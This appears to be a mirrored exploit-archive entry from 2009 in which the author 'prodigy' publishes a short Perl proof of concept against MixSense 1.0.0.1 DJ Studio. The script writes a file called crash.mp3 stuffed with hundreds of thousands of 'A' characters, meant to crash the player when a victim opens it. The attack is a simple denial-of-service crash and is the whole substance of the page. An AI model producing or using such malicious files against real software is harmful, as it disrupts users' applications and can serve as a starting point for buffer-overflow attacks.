[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Exploit
# Published : 2009-07-16
# Author : prodigy
# Previous Title : Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC
# Next Title : Hamster Audio Player 0.3a Local Buffer Overflow PoC
#!/usr/bin/perl -w
#
# MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: smack_the_stream@hotmail.com
#
# Vendor: MixSense
#
# Usage to reproduce the bug: when you created the malicious file, open with Mixsense and booom!
#
# Platform: Windows
#
###################################################################
==PoC==
use strict;
use diagnostics;
my $file= "crash.mp3";
my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open($FILE,">>$file");
print $FILE "$boom";
close($FILE);
print "File Created successfullyn";
==EndPoC==
##Greetz: Greetz myself for find the bug.
# www.Syue.com [2009-07-16]